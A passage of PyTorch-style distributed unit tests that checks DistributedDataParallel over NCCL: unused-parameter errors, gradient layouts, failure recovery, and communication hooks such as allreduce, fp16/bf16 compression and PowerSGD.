@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_arbitrary_forward_return_value_grad_is_view(self):
self._test_arbitrary_forward_return_value(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_with_lazy_parameters(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Modules with uninitialized parameters"
):
DistributedDataParallel(
torch.nn.LazyLinear(10), process_group=process_group
)
def _test_find_unused_parameters_kwarg(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
torch.cuda.set_device(self.rank)
dist.init_process_group(
backend="nccl",
world_size=self.world_size,
rank=self.rank,
init_method=f"file://{self.file_name}",
)
process_group = c10d.distributed_c10d._get_default_group()
class FindUnusedParametersModule(nn.Module):
def __init__(self):
super(FindUnusedParametersModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.fc3 = nn.Linear(4, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
# Return the fc3 module so that the caller can invoke it
# outside of the forward function. While this is bad practice,
# we can use it to trigger a reducer error.
return (F.softmax(x, dim=1), self.fc3)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
ddp_model = None
def test_find_unused_parameters(
find_unused_parameters, test_default=False, gradient_as_bucket_view=False
):
if test_default:
model = DistributedDataParallel(
FindUnusedParametersModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
else:
model = DistributedDataParallel(
FindUnusedParametersModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
find_unused_parameters=find_unused_parameters,
gradient_as_bucket_view=gradient_as_bucket_view,
)
nonlocal ddp_model
ddp_model = model
output, fc3 = model(input)
output = fc3(output)
loss = criterion(output, target)
loss.backward()
# First test that finding unused params under these conditions is to
# trigger an error when `backward` is called (because fc3 is an unused
# parameter and will therefore be marked ready twice).
try:
test_find_unused_parameters(
True, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.assertTrue(
str(ex).startswith(
"Expected to mark a variable ready only once.",
)
)
unused_index = 2
unused_index_str = f"Parameter at index {unused_index}"
model = ddp_model.module
for module_name, module in model.named_modules():
if module == model.fc3:
for parameter_name, _ in module.named_parameters(recurse=False):
unused_fqn = f"{module_name}.{parameter_name}"
# Only one such parameter in model.fc3, since bias=False
break
if dist._get_debug_mode() != dist._DistributedDebugLevel.OFF:
unused_index_str += f" with name {unused_fqn}"
self.assertTrue(unused_index_str in str(ex))
else:
self.fail("Expected exception")
dist.barrier(process_group)
# Then test that the default behavior can be overridden by setting
# `find_unused_parameters=False`.
try:
test_find_unused_parameters(
False, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.fail("Unexpected exception: %s" % ex)
# Test find_unused_parameters defaults to False
try:
test_find_unused_parameters(
True, test_default=True, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.fail("Unexpected exception: %s" % ex)
# TODO: Combine the following tests once https://github.com/pytorch/pytorch/issues/55967
# is resolved.
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["DETAIL"])
def test_find_unused_parameters_kwarg_debug_detail(self):
self._test_find_unused_parameters_kwarg()
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["INFO"])
def test_find_unused_parameters_kwarg_debug_info(self):
self._test_find_unused_parameters_kwarg()
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["OFF"])
def test_find_unused_parameters_kwarg_debug_off(self):
self._test_find_unused_parameters_kwarg()
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["DETAIL"])
def test_find_unused_parameters_kwarg_grad_is_view_debug_detail(self):
self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["INFO"])
def test_find_unused_parameters_kwarg_grad_is_view_debug_info(self):
self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
@with_dist_debug_levels(levels=["OFF"])
def test_find_unused_parameters_kwarg_grad_is_view_debug_off(self):
self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
def _test_multiple_outputs_multiple_backward(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class MultipleOutputModule(nn.Module):
def __init__(self):
super(MultipleOutputModule, self).__init__()
def define_module():
return nn.Sequential(
nn.Linear(2, 10, bias=False),
nn.ReLU(),
nn.Linear(10, 4, bias=False),
nn.ReLU(),
)
self.module0 = define_module()
self.module1 = define_module()
def forward(self, x):
return (
F.softmax(self.module0(x), dim=1),
F.softmax(self.module1(x), dim=1),
)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
MultipleOutputModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
# Compute loss and gradients for both outputs
output1, output2 = model(input)
loss1 = criterion(output1, target)
loss1.backward()
loss2 = criterion(output2, target)
loss2.backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_multiple_outputs_multiple_backward(self):
self._test_multiple_outputs_multiple_backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_multiple_outputs_multiple_backward_grad_is_view(self):
self._test_multiple_outputs_multiple_backward(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_no_grad(self):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class NoGradModule(nn.Module):
def __init__(self):
super(NoGradModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
NoGradModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
)
batch_size = 4
input = torch.rand([batch_size, 2], dtype=torch.float)
def check_no_grads():
for p in model.parameters():
self.assertTrue(p.requires_grad)
self.assertIsNone(p.grad)
# After initialization, no parameter has their gradient set.
check_no_grads()
# Run `forward` function with torch.no_grad()
with torch.no_grad():
output = model(input)
self.assertTrue(isinstance(output, torch.Tensor))
# No parameter should have their gradient set.
check_no_grads()
def _test_accumulate_gradients_module(self, gradient_as_bucket_view=False):
# This is NOT the recommended way to implement accumulating grads, but
# we would like to make sure DDP does not mess up with the underlying
# module.
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
global_batch_size = self.world_size
model, ddp_model, input, target = self._prepare_single_device_module(
process_group, devices, devices, global_batch_size, gradient_as_bucket_view
)
def step_model(model, input, target):
model.train()
output = model(input)
loss = F.mse_loss(output, target.to(output.device))
loss.backward()
# ensure accumulate grads works with no_grad
with torch.no_grad():
ddp_model.train()
ddp_model.module(input)
# Check two model parameters over 4 iterations.
# Use 4 iterations because we alternate between reducing and
# not reducing and want to make sure we switch both ways.
for iteration in range(4):
step_model(model, input, target)
if iteration % 2 == 0:
# Skip gradients sync without calling prepare_for_backward
step_model(
ddp_model.module,
input[self.rank : (self.rank + 1)],
target[self.rank : (self.rank + 1)],
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertNotEqual(i.grad, j.grad)
else:
step_model(
ddp_model,
input[self.rank : (self.rank + 1)],
target[self.rank : (self.rank + 1)],
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(i.grad, j.grad, rtol=1.3e-06, atol=5e-5)
# Shuffle the input so that DDP input is different
torch.manual_seed(1337 + iteration)
input = input[torch.randperm(global_batch_size)]
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_module(self):
self._test_accumulate_gradients_module()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_module_with_grad_is_view(self):
self._test_accumulate_gradients_module(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_failure_recovery(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# need to create a separate file for the recovered FileStore, because
# the original one will be deleted when destructing the first FileStore.
recovery_filename = self.file_name + "_recovery"
if self.rank == 0:
# the file will be deleted by the recovered FileStore
open(recovery_filename, "w").close()
# not necessary to run barrier here, as DDP will synchronize
class TestModel(nn.Module):
def __init__(self):
super(TestModel, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = TestModel().float().to(device_id)
ddp = DistributedDataParallel(
model,
device_ids=[device_id],
process_group=process_group,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
for _ in range(6):
output = ddp(input)
loss = criterion(output, target)
loss.backward()
del ddp
del process_group
del store # this will delete self.file_name
store = c10d.FileStore(recovery_filename, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
ddp = DistributedDataParallel(
model,
device_ids=[device_id],
process_group=process_group,
)
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
for _ in range(6):
output = ddp(input)
loss = criterion(output, target)
loss.backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_pass_default_pg(self):
dist.init_process_group(
"nccl",
init_method=f"file://{self.file_name}",
world_size=self.world_size,
rank=self.rank,
)
default_pg = c10d.distributed_c10d._get_default_group()
dist.destroy_process_group(default_pg)
self.assertFalse(dist.is_initialized())
def _test_grad_layout(self, replica_devices, layer_devs, local_batch_size):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
global_batch_size = local_batch_size * self.world_size
# Carry out some trials with small buckets and some with big buckets.
bucketsizes = (0.000001, 25)
# Tuples of lists. Each list describes per-layer characteristics for one trial.
layer_formats = (
[torch.contiguous_format] * 4,
[torch.channels_last] * 2 + [torch.contiguous_format] * 2,
[torch.channels_last] * 4,
)
layer_dtypes = (
[torch.float] * 4,
[torch.float] * 2 + [torch.half] * 2,
[torch.half] * 4,
)
input_dev = layer_devs[0] if isinstance(layer_devs, list) else layer_devs
target_dev = layer_devs[-1] if isinstance(layer_devs, list) else layer_devs
input = torch.randn(
(global_batch_size, 8, 8, 8), device=input_dev, dtype=torch.float
)
target = torch.randn(
(global_batch_size, 8, 4, 4), device=target_dev, dtype=torch.float
)
local_batch_start = self.rank * local_batch_size
local_batch_end = (self.rank + 1) * local_batch_size
# Reducer.cpp sneakily creates one "initial bucket" that ignores the "bucket_cap_mb"
# argument. The following makes sure the initial bucket also complies.
@contextmanager
def first_bucket_size(ddp_bucket_mb):
old_DEFAULT_FIRST_BUCKET_BYTES = dist._DEFAULT_FIRST_BUCKET_BYTES
dist._DEFAULT_FIRST_BUCKET_BYTES = int(ddp_bucket_mb * 1.0e6)
try:
yield
finally:
dist._DEFAULT_FIRST_BUCKET_BYTES = old_DEFAULT_FIRST_BUCKET_BYTES
with torch.backends.cudnn.flags(
enabled=True, deterministic=True, benchmark=False
):
for formats, dtypes, bucketsize in product(
layer_formats, layer_dtypes, bucketsizes
):
with first_bucket_size(bucketsize):
model_msg = (
"rank = {} formats = {} dtypes = {} bucketsize = {} ".format(
self.rank, formats, dtypes, bucketsize
)
)
try:
m = ConvNet(layer_devs, formats, dtypes)
m_ddp = DistributedDataParallel(
copy.deepcopy(m),
device_ids=replica_devices,
process_group=process_group,
bucket_cap_mb=bucketsize,
)
opt = torch.optim.SGD(m.parameters(), lr=0.1)
opt_ddp = torch.optim.SGD(m_ddp.parameters(), lr=0.1)
has_half = any(p.dtype is torch.half for p in m.parameters())
tol = 1.0e-3 if has_half else 1.0e-5
except BaseException:
# Prints case-specific debugging info to narrow down failing case.
print(
"Caught exception during model creation for " + model_msg,
flush=True,
)
raise
# 3 iters: First iter creates grads, second iter retests after rebucketing,
# third iter tries zeroed grads.
for it in range(3):
iter_msg = "iter = {} ".format(it) + model_msg
named_msg = iter_msg
try:
F.mse_loss(m(input).float(), target).backward()
F.mse_loss(
m_ddp(input[local_batch_start:local_batch_end]).float(),
target[local_batch_start:local_batch_end],
).backward()
for i, ((layer_name, m_child), m_ddp_child) in enumerate(
zip(m.named_children(), m_ddp.module.children())
):
named_msg = layer_name + ".weight" + " " + iter_msg
self.assertTrue(
m_child.weight.grad.is_contiguous(
memory_format=formats[i]
),
named_msg,
)
self.assertTrue(
m_ddp_child.weight.grad.is_contiguous(
memory_format=formats[i]
),
named_msg,
)
for j, ((param_name, p), p_ddp) in enumerate(
zip(
m_child.named_parameters(),
m_ddp_child.parameters(),
)
):
named_msg = (
layer_name + "." + param_name + " " + iter_msg
)
self.assertEqual(
p.grad, p_ddp.grad, rtol=tol, atol=tol
)
opt.step()
opt_ddp.step()
if it == 0:
for p, p_ddp in zip(m.parameters(), m_ddp.parameters()):
p.grad = None
p_ddp.grad = None
else:
m.zero_grad()
m_ddp.zero_grad()
except BaseException:
# Makes sure we still get info if an error occurred somewhere other than the asserts.
print(
"Caught exception during iterations at " + named_msg,
flush=True,
)
raise
@requires_nccl()
@skip_if_lt_x_gpu(2)
@skip_if_rocm
def test_grad_layout_1devicemodule_1replicaperprocess(self):
dev0 = torch.device("cuda:" + str(gpus_for_rank(self.world_size)[self.rank][0]))
# Tells DDP to use just one device.
replica_devices = [dev0]
# Tells _test_grad_layout to construct ConvNet with all layers on this process's first assigned device.
layer_devs = dev0
local_batch_size = 8
self._test_grad_layout(replica_devices, layer_devs, local_batch_size)
@requires_nccl()
@skip_if_lt_x_gpu(4)
@skip_if_rocm
def test_grad_layout_2devicemodule(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
dev0 = torch.device("cuda:" + str(int_devices[0]))
dev1 = torch.device("cuda:" + str(int_devices[1]))
# DDP's default behavior for a multi-device module is "don't replicate."
replica_devices = None
# Tells _test_grad_layout to constructs this process's ConvNet on 2 devices, with 2 layers on each device.
layer_devs = [dev0] * 2 + [dev1] * 2
local_batch_size = 8
self._test_grad_layout(replica_devices, layer_devs, local_batch_size)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_param_layout_mismatch_error(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
dev0 = torch.device("cuda:" + str(gpus_for_rank(self.world_size)[self.rank][0]))
layer_devs = dev0
layer_formats = (
[torch.contiguous_format] * 4
if self.rank == 0
else [torch.channels_last] * 4
)
layer_dtypes = [torch.float] * 4
m = ConvNet(layer_devs, layer_formats, layer_dtypes)
if self.rank == 0:
m_ddp = DistributedDataParallel(
m, device_ids=[dev0], process_group=process_group
)
else:
with self.assertRaisesRegex(
RuntimeError,
".* appears not to match strides of the same param in process 0",
):
m_ddp = DistributedDataParallel(
m, device_ids=[dev0], process_group=process_group
)
def _gpu_model_with_ddp_comm_hook(
self,
process_group,
hook=None,
gradient_as_bucket_view=False,
state=None,
static_graph=False,
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
if static_graph:
gpu_model._set_static_graph()
# Register a DDP communication hook if any.
if hook is not None:
gpu_model.register_comm_hook(state, hook)
return gpu_model
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_future_passing_gpu_nccl(self):
"""
This unit test verifies whether the Future object is passed properly using nccl backend.
The hook callback function creates a Future object and sets a value to it.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# Get GPU model with simple_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(process_group, self._simple_hook)
# check whether the grads are equal to what simple_hook's then callback returns.
# without the comm_hook, result would be 0.25 * torch.ones(2, 2).
self._run_and_verify_hook(gpu_model, 8, 2 * torch.ones(2, 2))
def _test_ddp_comm_hook_allreduce_hook_nccl(
self, gradient_as_bucket_view=False, static_graph=False
):
"""
This unit test verifies whether a DDP communication hook that just calls
allreduce gives the same result with the case of no hook registered.
Without the then callback, the future_value in reducer is no longer
a PyObject, and this unit test verifies future_value is properly checked.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce_hook(
state: object, bucket: dist.GradBucket
) -> torch.futures.Future[torch.Tensor]:
tensors = [bucket.buffer() / self.world_size]
return (
process_group.allreduce(tensors)
.get_future()
.then(lambda fut: fut.value()[0])
)
# Get GPU model with allreduce_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, allreduce_hook, gradient_as_bucket_view, static_graph
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_default_ddp_comm_hooks_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether default Python DDP communication hooks ALLREDUCE, FP16_COMPRESS
and BF16_COMPRESS, can give the same result with the case of no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# For these default DDP comm hooks, the only state is process group.
state = process_group
hook_options = [default.allreduce_hook, default.fp16_compress_hook]
if (
not TEST_WITH_ROCM
and BFLOAT16_AVAILABLE
and c10d.is_nccl_available()
and torch.cuda.nccl.version() >= (2, 9, 7)
):
hook_options.append(default.bf16_compress_hook)
for hook in hook_options:
# Get GPU model with the hook registered.
# The first arg 'process_group' is used for initializing the test environment,
# so it cannot be replaced by 'state', although they have the same value.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, hook, gradient_as_bucket_view, state
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_fp16_compress_wrapper(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether wrapping the ALLREDUCE and POWER_SGD hooks with
the FP16_WRAPPER can give the same result as when there is no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
powerSGD_state = powerSGD.PowerSGDState(process_group=process_group)
hook_args = [
(powerSGD.powerSGD_hook, powerSGD_state),
(default.allreduce_hook, process_group),
]
for hook, state in hook_args:
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group,
default.fp16_compress_wrapper(hook),
gradient_as_bucket_view,
state,
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_bf16_compress_wrapper(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether wrapping the ALLREDUCE and POWER_SGD hooks with
the BF16_WRAPPER can give the same result as when there is no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
powerSGD_state = powerSGD.PowerSGDState(process_group=process_group)
hook_args = [
(powerSGD.powerSGD_hook, powerSGD_state),
(default.allreduce_hook, process_group),
]
for hook, state in hook_args:
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group,
default.bf16_compress_wrapper(hook),
gradient_as_bucket_view,
state,
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_hook_then_optimizer(
self,
functional_optim_cls,
*functional_optim_args,
gradient_as_bucket_view=False,
**functional_optim_kwargs
):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
hook, hook_state = default.allreduce_hook, process_group
opt_hook_state = default._OptimizerHookState(
functional_optim_cls,
*functional_optim_args,
**functional_optim_kwargs,
)
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group,
default._hook_then_optimizer(hook, opt_hook_state),
gradient_as_bucket_view,
hook_state,
)
prev_params = copy.deepcopy(list(gpu_model.parameters()))
# Run model with optimizer as part of hook
for _ in range(8):
gpu_model.zero_grad()
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
new_params = list(gpu_model.parameters())
# Run plain model with allreduce hook and separate optimizer step.
# Verify gradients are the same.
gpu_model_allreduce = self._gpu_model_with_ddp_comm_hook(
process_group, default.allreduce_hook, gradient_as_bucket_view, hook_state
)
mapping = {v: k for k, v in functional_optim_map.items()}
sgd = mapping.get(functional_optim_cls)(
gpu_model_allreduce.parameters(),
*functional_optim_args,
**functional_optim_kwargs,
)
for _ in range(8):
gpu_model_allreduce.zero_grad()
self._run_and_verify_hook(gpu_model_allreduce, 8, 0.25 * torch.ones(2, 2))
sgd.step()
post_opt_params = list(gpu_model_allreduce.parameters())
for opt_as_hook_param, post_opt_param in zip(new_params, post_opt_params):
self.assertEqual(opt_as_hook_param, post_opt_param)
def _test_powerSGD_ddp_comm_hook_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether Python DDP communication hook POWER_SGD
can give the same result with the case of no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# Get GPU model with the hook registered.
# Test the hook with different algorithmic configs.
for use_error_feedback, warm_start in product([True, False], [True, False]):
state = powerSGD.PowerSGDState(
process_group=process_group,
matrix_approximation_rank=1,
use_error_feedback=use_error_feedback,
warm_start=warm_start,
)
for hook in [powerSGD.powerSGD_hook, powerSGD.batched_powerSGD_hook]:
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, hook, gradient_as_bucket_view, state
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_builtin_ddp_comm_hooks_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether built-in C++ DDP communication hooks ALLREDUCE and FP16_COMPRESS
can give the same result with the case of no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for comm_hook_type in [
dist.BuiltinCommHookType.ALLREDUCE,
dist.BuiltinCommHookType.FP16_COMPRESS,
]:
# Get GPU model with the built-in communication hook.
gpu_model = self._gpu_model_with_builtin_ddp_comm_hook(
process_group, comm_hook_type, gradient_as_bucket_view
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_hook_nccl(self):
self._test_ddp_comm_hook_allreduce_hook_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_default_ddp_comm_hooks_nccl(self):
self._test_default_ddp_comm_hooks_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_compress_wrapper_nccl(self):
self._test_fp16_compress_wrapper()
@requires_nccl()
@requires_nccl_version((2, 9, 7), "Need NCCL 2.9.7+ for BF16_COMPRESS")
@sandcastle_skip_if(
not BFLOAT16_AVAILABLE,
"BFloat16 is only supported by CUDA 11+",
)
@skip_if_lt_x_gpu(2)
@skip_if_rocm
def test_bf16_compress_wrapper_nccl(self):
self._test_bf16_compress_wrapper()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_sgd_nccl(self):
sgd_lr = 1e-2
sgd_momentum = 0.9
sgd_weight_decay = 0.01
self._test_hook_then_optimizer(
_FunctionalSGD,
sgd_lr,
momentum=sgd_momentum,
weight_decay=sgd_weight_decay,
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_sgd_nccl_grad_as_bucket_view(self):
sgd_lr = 1e-2
sgd_momentum = 0.9
sgd_weight_decay = 0.01
self._test_hook_then_optimizer(
_FunctionalSGD,
sgd_lr,
momentum=sgd_momentum,
weight_decay=sgd_weight_decay,
gradient_as_bucket_view=True
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_adamw_nccl(self):
adamw_lr = 1e-2
adamw_betas = (0.9, 0.99)
adamw_eps = 1e-6
self._test_hook_then_optimizer(
_FunctionalAdamW,
adamw_lr,
betas=adamw_betas,
eps=adamw_eps,
gradient_as_bucket_view=True
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_adam_nccl(self):
adam_lr = 1e-2
adam_betas = (0.9, 0.99)
adam_eps = 1e-6
self._test_hook_then_optimizer(
_FunctionalAdam,
adam_lr,
betas=adam_betas,
eps=adam_eps,
gradient_as_bucket_view=True
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_adam_nccl_grad_as_bucket_view(self):
adam_lr = 1e-2
adam_betas = (0.9, 0.99)
adam_eps = 1e-6
self._test_hook_then_optimizer(
_FunctionalAdam,
adam_lr,
betas=adam_betas,
eps=adam_eps,
gradient_as_bucket_view=True
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_builtin_ddp_comm_hooks_nccl(self):
self._test_builtin_ddp_comm_hooks_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_powerSGD_ddp_comm_hook_nccl(self):
self._test_powerSGD_ddp_comm_hook_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_hook_nccl_grad_is_view(self):
self._test_ddp_comm_hook_allreduce_hook_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_hook_nccl_static_graph(self):
self._test_ddp_comm_hook_allreduce_hook_nccl(static_graph=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_default_ddp_comm_hooks_nccl_is_view(self):
self._test_default_ddp_comm_hooks_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_compress_wrapper_is_view(self):
self._test_fp16_compress_wrapper(gradient_as_bucket_view=True)
@requires_nccl()
@requires_nccl_version((2, 9, 7), "Need NCCL 2.9.7+ for BF16_COMPRESS")
@sandcastle_skip_if(
not BFLOAT16_AVAILABLE,
"BFloat16 is only supported by CUDA 11+",
)
@skip_if_lt_x_gpu(2)
@skip_if_rocm
def test_bf16_compress_wrapper_is_view(self):
self._test_bf16_compress_wrapper(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_builtin_ddp_comm_hooks_nccl_grad_is_view(self):
self._test_builtin_ddp_comm_hooks_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_powerSGD_ddp_comm_hook_nccl_grad_is_view(self):
self._test_powerSGD_ddp_comm_hook_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_with_then_hook_nccl(self):
"""
This unit test verifies whether a DDP communication hook that calls allreduce and then
multiplies the result by ten and divides by two gives the expected result.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce_with_then_hook(
state: object, bucket: dist.GradBucket
) -> torch.futures.Future[torch.Tensor]:
tensors = [bucket.buffer() / self.world_size]
fut = process_group.allreduce(tensors).get_future()
def mult(fut):
# Multiply the result by 10.
return 10 * fut.value()[0]
def div(fut):
# Divide the result by 2.
return 0.5 * fut.value()
return fut.then(mult).then(div)
# Get GPU model with allreduce_with_then_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, allreduce_with_then_hook
)
# check whether the grads are equal to what allreduce returns multuplied by 5.
# without the comm_hook, result would be still 0.25 * torch.ones(2, 2).
self._run_and_verify_hook(gpu_model, 8, 1.25 * torch.ones(2, 2))
class AcceptsParam(torch.nn.Module):
def __init__(self, p, factor):
super().__init__()
self.a = p
self.f = factor
def forward(self, input):
return input + self.a * self.f
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_weight_sharing(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
size = 2048 * 2048
dev = self.rank
world = self.world_size
p = torch.nn.Parameter(torch.randn(size, requires_grad=True))
